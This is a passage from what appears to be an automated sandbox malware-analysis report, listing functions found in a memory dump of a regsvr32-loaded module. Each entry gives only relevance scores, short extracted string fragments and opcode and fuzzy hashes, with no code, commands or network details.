                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: IB$fHm$y#
                                                                                                                      • API String ID: 0-1257940540
                                                                                                                      • Opcode ID: c7549a3a96834fbdcaa46a8ec8a1bd721d3e0c12902b6553c9d2db9a2f13d94b
                                                                                                                      • Instruction ID: e11748ce95192785779676fe7604909bdde065d39e12bee754eed8dca0a80f0f
                                                                                                                      • Opcode Fuzzy Hash: c7549a3a96834fbdcaa46a8ec8a1bd721d3e0c12902b6553c9d2db9a2f13d94b
                                                                                                                      • Instruction Fuzzy Hash: 92B18AB9903249CFCBA8DF78D09A59E3BF1EF64348F204119FC269A262D374D525CB48
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 000000018000F630 Relevance: 3.9, Strings: 3, Instructions: 168COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 5&!$c69/$'
                                                                                                                      • API String ID: 0-406246438
                                                                                                                      • Opcode ID: d64a34c2ba1eb87071a757d614926356f7c1070ac819bc3ca427f3f9ab515c3a
                                                                                                                      • Instruction ID: d430d2591fbb9be6b25a8f42e8fe3ab661db41516f6541044951d31af64dd1c6
                                                                                                                      • Opcode Fuzzy Hash: d64a34c2ba1eb87071a757d614926356f7c1070ac819bc3ca427f3f9ab515c3a
                                                                                                                      • Instruction Fuzzy Hash: 30713D7151464C8BDB99CF28C8897ED3BA0FB5C358F555229F84AE73A0C778D948CB84
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0000000180001F84 Relevance: 3.9, Strings: 3, Instructions: 166COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: #X$*@$_T0
                                                                                                                      • API String ID: 0-1735694254
                                                                                                                      • Opcode ID: 2de5aa35c8c04bde03b1c948b9f970bd0d749dfebf6ab79bc051e23e30d925ef
                                                                                                                      • Instruction ID: 1717a8ecc315b8e7d77091f97358a018ff1378bbeda228c1f86ac34e8be72a3d
                                                                                                                      • Opcode Fuzzy Hash: 2de5aa35c8c04bde03b1c948b9f970bd0d749dfebf6ab79bc051e23e30d925ef
                                                                                                                      • Instruction Fuzzy Hash: 0671047152064D9FCB89DF28C8C6ADA3FB1FB48398F956218FC0AA7254C774D589CB84
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 000000018001984C Relevance: 3.9, Strings: 3, Instructions: 164COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: ;N$&d$xyg
                                                                                                                      • API String ID: 0-4099939184
                                                                                                                      • Opcode ID: 29da78752c8fb41af66b494646322935c493650992952de8ea87871672ba5332
                                                                                                                      • Instruction ID: 0c3601dd709466f856989612b3a3f60236fff7139607c449161e4a4c563875c1
                                                                                                                      • Opcode Fuzzy Hash: 29da78752c8fb41af66b494646322935c493650992952de8ea87871672ba5332
                                                                                                                      • Instruction Fuzzy Hash: 9671EA71E04B0C8FDBA8DF98D4896DDBBF1FB58344F004519E805E7291DBB8991ACB85
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 000000018000CA8C Relevance: 3.9, Strings: 3, Instructions: 153COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: &.5U$,X$ce
                                                                                                                      • API String ID: 0-704610441
                                                                                                                      • Opcode ID: f5a436e5108e1efed7081bab2ddb72be47fe8ac47e93eef499482780ee1b458a
                                                                                                                      • Instruction ID: baf8f546504df25f731dc5a8b20cd796bbe445358a42564c604a536fe0486752
                                                                                                                      • Opcode Fuzzy Hash: f5a436e5108e1efed7081bab2ddb72be47fe8ac47e93eef499482780ee1b458a
                                                                                                                      • Instruction Fuzzy Hash: 5781F671508788CFDBB9DF28C886ADE7BF0FB88744F20461DE95A8A260DB719645CF01
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0000000180006538 Relevance: 3.9, Strings: 3, Instructions: 153COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: ?v$jKA$kN
                                                                                                                      • API String ID: 0-1873296357
                                                                                                                      • Opcode ID: bfaf4231e3c9cd50d0b7fc32e76ae015456f8b7cf4ec77da98cc8f5bba445413
                                                                                                                      • Instruction ID: 2ba2904ca82667a9707be82b3258ca5a3ec1dbea1b2648015fade0bab2076f57
                                                                                                                      • Opcode Fuzzy Hash: bfaf4231e3c9cd50d0b7fc32e76ae015456f8b7cf4ec77da98cc8f5bba445413
                                                                                                                      • Instruction Fuzzy Hash: 1271FD7191478C8BDBB9CF34C8857DD3BE1FB44348F608219EC9ACA262DB74954ACB81
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0000000180013D14 Relevance: 3.9, Strings: 3, Instructions: 144COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 2m$j.$j.
                                                                                                                      • API String ID: 0-94445638
                                                                                                                      • Opcode ID: dd2dac2a9ad1f856fb2d3a0ff57b1e77c2e4fbe4e0a22cfec8b999e170a6eccb
                                                                                                                      • Instruction ID: eaf9d1780893311decf85230c9ebb23771199df11d7bf69b379eff31725626d9
                                                                                                                      • Opcode Fuzzy Hash: dd2dac2a9ad1f856fb2d3a0ff57b1e77c2e4fbe4e0a22cfec8b999e170a6eccb
                                                                                                                      • Instruction Fuzzy Hash: 3C514A70519744ABD3D9CF28D18675ABBE1FBD8744F80A92DF4828B260D774D808CB42
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 000000018000EF94 Relevance: 3.9, Strings: 3, Instructions: 118COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: A<4$C$`&
                                                                                                                      • API String ID: 0-2179575223
                                                                                                                      • Opcode ID: d8e6bab2b315d52c7802607509c80fcb96bbc8d96b6e5b65236b2b0a6e1bb3d4
                                                                                                                      • Instruction ID: ff804f59c04657e594807974efa96958079bb1d629e88fe749e722361567aba9
                                                                                                                      • Opcode Fuzzy Hash: d8e6bab2b315d52c7802607509c80fcb96bbc8d96b6e5b65236b2b0a6e1bb3d4
                                                                                                                      • Instruction Fuzzy Hash: 98516B7051D7489BD7D5DF28C58675EB6E0FB88748F80A91DF48A872A0DBB4CA088B43
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 000000018000C3D8 Relevance: 2.9, Strings: 2, Instructions: 397COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 8Z$B.
                                                                                                                      • API String ID: 0-2527348568
                                                                                                                      • Opcode ID: cb07a6e61e180255bfc0c082a29cde48e0cd665697f501792ffa18a34e0636f7
                                                                                                                      • Instruction ID: 9aab12200af81379afa0b2d2d592fa5a7a58bce18c8a16dc476b58366764752b
                                                                                                                      • Opcode Fuzzy Hash: cb07a6e61e180255bfc0c082a29cde48e0cd665697f501792ffa18a34e0636f7
                                                                                                                      • Instruction Fuzzy Hash: BD02E4705087848FD798DFA8C59AA9EFBE1FB88744F10891DF48687260D7B8D949CB43
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0000000180002940 Relevance: 2.8, Strings: 2, Instructions: 294COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: X!$^0a
                                                                                                                      • API String ID: 0-1224743159
                                                                                                                      • Opcode ID: 7d43f39276e3121b4c8e542901092cf00a08e55d93d7225333b14d65a11e94f1
                                                                                                                      • Instruction ID: a7807c11a96fba8ec87906a9c32fb9ca040f8b20e6b1188962637f1ff585e69d
                                                                                                                      • Opcode Fuzzy Hash: 7d43f39276e3121b4c8e542901092cf00a08e55d93d7225333b14d65a11e94f1
                                                                                                                      • Instruction Fuzzy Hash: 11D1F47150270CCBDBA8DF28C68A6DE3BE1FF48304F515129FC5A9A262D774D928CB49
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 000000018000CEC0 Relevance: 2.7, Strings: 2, Instructions: 242COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 9"E$b"7
                                                                                                                      • API String ID: 0-2406160391
                                                                                                                      • Opcode ID: bdfc60790cae6b311926f149bf3ef378d7987713bef259f0ef4f2601ef505d4c
                                                                                                                      • Instruction ID: 4729aa684f4cf0cf2c7082796cf89e6c5177ac6ad53b4d1bc26d5cc85e11bbfe
                                                                                                                      • Opcode Fuzzy Hash: bdfc60790cae6b311926f149bf3ef378d7987713bef259f0ef4f2601ef505d4c
                                                                                                                      • Instruction Fuzzy Hash: D8C1F97090470CEFCB58DFA8C08AA9EBBF1FF48344F41856DE81AAB250D7759A19CB45
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00000001800023EC Relevance: 2.7, Strings: 2, Instructions: 211COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: ,j$u?
                                                                                                                      • API String ID: 0-32454123
                                                                                                                      • Opcode ID: 1e2b90abaf5692546a23715ace210e63f83a8746545ba5f71cf27a08c9ac8db2
                                                                                                                      • Instruction ID: 09ee64cd2562f652a6c88991b677a947abc03663dbc22cb522f323cc2ccf05fc
                                                                                                                      • Opcode Fuzzy Hash: 1e2b90abaf5692546a23715ace210e63f83a8746545ba5f71cf27a08c9ac8db2
                                                                                                                      • Instruction Fuzzy Hash: 21B1F6705093C88BDBBACF64C8897DE7BE8FB84708F10551DE94ADA254CBB49748CB45
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 000000018000EC98 Relevance: 2.7, Strings: 2, Instructions: 196COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 3'$H-f|
                                                                                                                      • API String ID: 0-3900981928
                                                                                                                      • Opcode ID: 7babadf898553130d125f285db8466b746a5a7a45dbfb1dc774e0700f2f59bff
                                                                                                                      • Instruction ID: 38bea5138d20be1c52fc03dbe9ea09247679a69a12f36e325c00f6ec78e0f295
                                                                                                                      • Opcode Fuzzy Hash: 7babadf898553130d125f285db8466b746a5a7a45dbfb1dc774e0700f2f59bff
                                                                                                                      • Instruction Fuzzy Hash: 2F91E371A0174CCBDB59DF68D1896DD77F2EF48344F00811AF90AAB2A1CB749929CB89
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 000000018001EC00 Relevance: 2.7, Strings: 2, Instructions: 181COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Q9$T
                                                                                                                      • API String ID: 0-2501855307
                                                                                                                      • Opcode ID: 344b171c75e8f9920b60997535748caac577cfdca684fadd912cee9f802842d2
                                                                                                                      • Instruction ID: 3f1e3a4c724c2f18e283f0ee59692568e4fb7cb8f6e81ae7a5f3a6dada0ec80c
                                                                                                                      • Opcode Fuzzy Hash: 344b171c75e8f9920b60997535748caac577cfdca684fadd912cee9f802842d2
                                                                                                                      • Instruction Fuzzy Hash: 24A1EA7160578C8FEBBACF54C8AA7DE37A0FB4A344F104129EE4D8E290DB745A45CB42
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 000000018001A094 Relevance: 2.7, Strings: 2, Instructions: 180COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: !`q$F.v
                                                                                                                      • API String ID: 0-3519430477
                                                                                                                      • Opcode ID: ca585a03472e59c29f8e8e3228e230334eb1a8ca1fe9402a6f69dfb7ed0b10c9
                                                                                                                      • Instruction ID: d09eccd63a3c69f02046d40d590e6628b04ddb540c62b563ee2b0a221ff57534
                                                                                                                      • Opcode Fuzzy Hash: ca585a03472e59c29f8e8e3228e230334eb1a8ca1fe9402a6f69dfb7ed0b10c9
                                                                                                                      • Instruction Fuzzy Hash: 75A104B0148788CBEBBADF34C88A7D93BA9FB54704F508659E80E8E250DF745789DB01
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0000000180001000 Relevance: 2.7, Strings: 2, Instructions: 177COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: ZI}$}/B
                                                                                                                      • API String ID: 0-1319169189
                                                                                                                      • Opcode ID: d3eb3f6fd5da17c6d0a5b5779a7316acec3df799211c902704459a1365a8aad1
                                                                                                                      • Instruction ID: 53b233fb0717f50f7fde993a93e013b8309a914d3c40dc18db3886ce92746564
                                                                                                                      • Opcode Fuzzy Hash: d3eb3f6fd5da17c6d0a5b5779a7316acec3df799211c902704459a1365a8aad1
                                                                                                                      • Instruction Fuzzy Hash: 0581117051024E8BDF59DF28D49A3DE3FA0FB28388F114229FC4696251D778DAA9CBC5
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00000001800252F4 Relevance: 2.7, Strings: 2, Instructions: 174COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: aP$p[
                                                                                                                      • API String ID: 0-4230194942
                                                                                                                      • Opcode ID: d8e63fa07139a7f2062c633816153ca0dee587910023ceb0337e4e705c5f6e14
                                                                                                                      • Instruction ID: cda7c12d65a7bdb00b560f1be50f7f54a96fd4506bd0a138e76e4f1baed161a1
                                                                                                                      • Opcode Fuzzy Hash: d8e63fa07139a7f2062c633816153ca0dee587910023ceb0337e4e705c5f6e14
                                                                                                                      • Instruction Fuzzy Hash: 4C710370508609DFCB59DF28C49AA9A3BE1FB48318F40852EF84ADB364D770DB58CB85
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0000000180024618 Relevance: 2.7, Strings: 2, Instructions: 164COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: wK!$w6T
                                                                                                                      • API String ID: 0-2345651858
                                                                                                                      • Opcode ID: 5b5673d920b0475acb6eaf035d4cf50cf512c04b11d85134ec945b217b15ae7b
                                                                                                                      • Instruction ID: f2c4ee1eac720261de8221f4e94bf971a4cb37d946f0d7bf39363f2c8cae5a05
                                                                                                                      • Opcode Fuzzy Hash: 5b5673d920b0475acb6eaf035d4cf50cf512c04b11d85134ec945b217b15ae7b
                                                                                                                      • Instruction Fuzzy Hash: E38176B551274DCFCB98DF28C69A59D3BE0FF59308F404129FC0A9A264D374E928CB49
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 000000018000BFC8 Relevance: 2.7, Strings: 2, Instructions: 159COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: fYA$ 6
                                                                                                                      • API String ID: 0-2239098682
                                                                                                                      • Opcode ID: ef5e2bff854fa64e08560e03ccf4bacdea2cbced946ab2932bb65b8f61935a9c
                                                                                                                      • Instruction ID: 95b1f226c8032eedf2056f3bc181879d75ec5f2651ad6373918ccd161046f0b7
                                                                                                                      • Opcode Fuzzy Hash: ef5e2bff854fa64e08560e03ccf4bacdea2cbced946ab2932bb65b8f61935a9c
                                                                                                                      • Instruction Fuzzy Hash: 95615F7011074D8BDB98CF28C8956EC3BA1FB48358F565329FC4AA63A0C778D985CF85
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 000000018002666C Relevance: 2.6, Strings: 2, Instructions: 147COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Q$_K
                                                                                                                      • API String ID: 0-3406562042
                                                                                                                      • Opcode ID: 16b58ed7794577ff8617612d0cd026bc48ace6ce7b0e4d10c3389edfc49863fa
                                                                                                                      • Instruction ID: 613309a2e4086f874445892882934324b1793bc355ef50438d328036046f93ea
                                                                                                                      • Opcode Fuzzy Hash: 16b58ed7794577ff8617612d0cd026bc48ace6ce7b0e4d10c3389edfc49863fa
                                                                                                                      • Instruction Fuzzy Hash: 6E514C7051C7448FC7A9DF18D4867AAB7E0FB98350F909A1DE8CAC3251DF70A8598B86
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 000000018001EFF4 Relevance: 2.6, Strings: 2, Instructions: 140COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: k$=
                                                                                                                      • API String ID: 0-2450263430
                                                                                                                      • Opcode ID: 944867476c26d9a728a2dd4f5d0b863e6d9a9954c4e836f5253c7b246162b0ce
                                                                                                                      • Instruction ID: ba362051472801d4597541ca10332c980f8f805137a937d53d7b006f2456742d
                                                                                                                      • Opcode Fuzzy Hash: 944867476c26d9a728a2dd4f5d0b863e6d9a9954c4e836f5253c7b246162b0ce
                                                                                                                      • Instruction Fuzzy Hash: 69517C71118B049BE7A9DF24C4897AABBE1FB84394F60591DF892C7361DB34D885CF42
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0000000180013F88 Relevance: 2.6, Strings: 2, Instructions: 132COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: "_^$ZA
                                                                                                                      • API String ID: 0-2525979066
                                                                                                                      • Opcode ID: 334c3b1ccc99c4196535f1586692f447595f8758e981802e11e67cae7b95d16f
                                                                                                                      • Instruction ID: 5100d127a314e06d6a4e2fbf05186db422f1eb31b8c7b43232414a62727caa3e
                                                                                                                      • Opcode Fuzzy Hash: 334c3b1ccc99c4196535f1586692f447595f8758e981802e11e67cae7b95d16f
                                                                                                                      • Instruction Fuzzy Hash: 8E512E705187848BC7A9DF28C18A65FFBF0FB86348F104A1DF6C686260D7B6D9498B43
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0000000180001EAC Relevance: 2.6, Strings: 2, Instructions: 121COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 1/$^1
                                                                                                                      • API String ID: 0-2730909476
                                                                                                                      • Opcode ID: 5068b8716f72d74c2da312abcd3c93248f27383ad8c559ceb374f481949fa81d
                                                                                                                      • Instruction ID: d6d6ffe5abe184c7866148d753644a54eda7aa3821f10ce78c73aa975c295420
                                                                                                                      • Opcode Fuzzy Hash: 5068b8716f72d74c2da312abcd3c93248f27383ad8c559ceb374f481949fa81d
                                                                                                                      • Instruction Fuzzy Hash: 8F510270A1DB849FC7A8DF28C08565ABBF1FBC8744F909A1EF589C7260DB71D8448B42
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 000000018000B880 Relevance: 2.6, Strings: 2, Instructions: 100COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: >ljL$sV#
                                                                                                                      • API String ID: 0-3085853521
                                                                                                                      • Opcode ID: 8163a4a740a8a9e8e59c1c53505ab1156dfe3b6c31cfff5498018919220e6d35
                                                                                                                      • Instruction ID: 3a9cf98d77ee43cf7027e8274459c02d03f3c6c72f4782606af54c6c5449dc17
                                                                                                                      • Opcode Fuzzy Hash: 8163a4a740a8a9e8e59c1c53505ab1156dfe3b6c31cfff5498018919220e6d35
                                                                                                                      • Instruction Fuzzy Hash: 0551C0B190034A8FCB48CF28D5865DE7FB0FB68398F114619E85AAA250E374D6A4CFD4
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 000000018001F121 Relevance: 2.6, Strings: 2, Instructions: 92COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: k$=
                                                                                                                      • API String ID: 0-2450263430
                                                                                                                      • Opcode ID: 3734db1e1fa76b1deb8c37b08e7554336876f5d77f929da89127bd52957ad7dc
                                                                                                                      • Instruction ID: d8f5e407170489de2d35fa5aa27e4fab6d5800c1f5893964db3a969ff841ce59
